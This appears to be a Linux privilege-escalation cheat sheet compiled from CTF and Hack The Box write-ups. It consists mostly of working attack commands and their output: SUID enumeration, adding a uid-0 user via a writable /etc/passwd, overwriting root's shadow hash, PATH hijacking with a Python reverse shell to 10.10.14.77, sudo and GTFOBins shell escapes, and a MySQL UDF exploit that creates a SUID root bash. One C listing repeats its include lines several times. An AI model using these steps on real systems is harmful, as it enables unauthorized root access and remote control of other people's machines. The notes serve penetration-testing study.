Elevation of Privileges - EoP

Privilege Escalation

Attack vectors

Scripts

LinEnum

LinPEAS

Linux Exploit Suggester

Linux Smart Enumeration

pspy

SUID/SGID

find / -perm -u=s -type f 2>/dev/null

# Find files whose mode is exactly 4755 (exact match; use -perm -u=s, as above, to catch any SUID bit regardless of the other bits)
find / -perm 4755

# Find all the SUID/SGID executables 
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Cronjob

cat /etc/crontab
crontab -l # user cronjobs
sudo crontab -l # root cronjobs

Writable files

/etc/passwd writable

  1. Create a password hash: openssl passwd -1 -salt [salt] [password]. Ex: `openssl passwd -1 -salt new 123` prints $1$new$p7ptkEKU1HnaHpRtzNizS1

  2. Add a new entry to /etc/passwd. Ex: new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

  3. Switch to the new user: `su new` (password: 123); `id` then shows uid=0(new) gid=0(root) groups=0(root)

/etc/shadow writable

  1. Generate a new password hash with a password of your choice: mkpasswd -m sha-512 newpasswordhere

  2. Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

  3. Switch to the root user, using the new password:

    su root

Path

Example 1

2019/10/08 10:56:02 CMD: UID=0    PID=2689   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

jkr@writeup:~$ which run-parts
/bin/run-parts

#
jkr@writeup:~$ cp perl-reverse-shell.pl run-parts
jkr@writeup:~$ ls
perl-reverse-shell.pl  run-parts  user.txt
jkr@writeup:~$ mv run-parts /usr/local/sbin

Ref: HTB - Write-Up

Example 2

# file weak_c.c

#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
 
/*
 * Deliberately weak SUID helper used by Example 2.
 * Returns 0 after running the command (system()'s status is not checked).
 */
int main(void)
{
    /* Make the real uid equal to the effective (SUID-owner) uid; presumably
       so that the shell started by system() does not drop privileges when
       ruid != euid -- confirm against the target's shell behaviour. */
    uid_t euid = geteuid();
    setreuid(euid, euid);

    /* system() passes this string to /bin/sh, which resolves the bare "ls"
       through the caller's inherited PATH -- that is the weakness this
       example demonstrates. A hardened build would call the binary by an
       absolute path (or execve() with a sanitised environment) instead. */
    system("ls /path/to/secret/.file");
    return 0;
}
$ which cat
/bin/cat
$ cp /bin/cat /tmp/ls
$ export PATH=/tmp/:$PATH
$ ./weak_c

Example 3

theseus@ubuntu:/tmp/poc$ nano fdisk
theseus@ubuntu:/tmp/poc$ cat fdisk
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.77",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
theseus@ubuntu:/tmp/poc$ chmod 777 fdisk
theseus@ubuntu:/tmp/poc$ export PATH=/tmp/poc:$PATH
theseus@ubuntu:/tmp/poc$ /bin/sysinfo

Sudo version

Sudo < 1.8.28

Sudo < 1.9.5p2 - CVE-2021-3156: Heap-Based Buffer Overflow

Debian 10 (Sudo 1.8.27)

Ubuntu 20.04 (Sudo 1.8.31)

sudo -l - No password

luvit - lua


User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/webadmin/luvit
$ 

#Exploitation
webadmin@traceback:/etc/update-motd.d$ sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
<n /home/sysadmin/luvit -e 'os.execute("/bin/bash")'
sysadmin@traceback:/etc/update-motd.d$

(ALL : ALL) ALL

technawi@Jordaninfosec-CTF01:~$ sudo -l
sudo -l
[sudo] password for technawi: 3vilH@ksor

Matching Defaults entries for technawi on Jordaninfosec-CTF01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User technawi may run the following commands on Jordaninfosec-CTF01:
    (ALL : ALL) ALL
    
technawi@Jordaninfosec-CTF01:~$ sudo su
sudo su
root@Jordaninfosec-CTF01:/home/technawi# cd /root  
cd /root

Bad Permissions - writable files

2020/03/15 09:27:45 CMD: UID=0    PID=10959  | run-parts --lsbsysinit /etc/update-motd.d 

webadmin@traceback:/etc/update-motd.d$ ls -la
ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Jul 29 00:30 00-header
-rwxrwxr-x  1 root sysadmin  982 Jul 29 00:30 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Jul 29 00:30 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Jul 29 00:30 80-esm
-rwxrwxr-x  1 root sysadmin  299 Jul 29 00:30 91-release-upgrade

# rWx
sysadmin@traceback:/etc/update-motd.d$ echo "cat /root/root.txt" >> 00-header
echo "cat /root/root.txt" >> 00-header
sysadmin@traceback:/etc/update-motd.d$ 

NFS Misconfiguration

ShellShock - Bash < 4.3

bash --version
GNU bash, version 4.2.46(2)-release (x86_64-redhat-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

MySQL

The MySQL service is running as root

 * $ id
 * uid=500(raptor) gid=500(raptor) groups=500(raptor)
 * $ gcc -g -c raptor_udf2.c
 * $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
 * $ mysql -u root -p
 * Enter password:
 * [...]
 * mysql> use mysql;
 * mysql> create table foo(line blob);
 * mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
 * mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
 * mysql> create function do_system returns integer soname 'raptor_udf2.so';
 * mysql> select * from mysql.func;
 * +-----------+-----+----------------+----------+
 * | name      | ret | dl             | type     |
 * +-----------+-----+----------------+----------+
 * | do_system |   2 | raptor_udf2.so | function |
 * +-----------+-----+----------------+----------+
 
 # 1 - id
 
 * mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
 * mysql> \! sh
 * sh-2.05b$ cat /tmp/out
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * [...]
 
 # 2- /bin/bash
 
 * mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
 * mysql> exit
 * /tmp/rootbash -p

GTFOBins

Vi

sudo vi
:!sh

More -> Vim

Réduire la taille du terminal au maximum pour piéger More. Quand dans More appuyer sur v pour entrer dans VIM

Dans vim
:set shell=/bin/sh
:shell

Nano

./nano
^R^X
reset; sh 1>&0 2>&0

Find

find . -exec /bin/sh -p \; -quit

Journalctl

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-16 07:49:55 EST, end at Mon 2019-12-16 07:50:52 E
Dec 16 07:50:00 traverxec systemd[1]: Starting nostromo nhttpd server...
Dec 16 07:50:00 traverxec systemd[1]: nostromo.service: Can't open PID file /v
Dec 16 07:50:00 traverxec nhttpd[451]: started
Dec 16 07:50:00 traverxec nhttpd[451]: max. file descriptors = 1040 (cur) / 10
Dec 16 07:50:00 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls

Systemctl

Sources
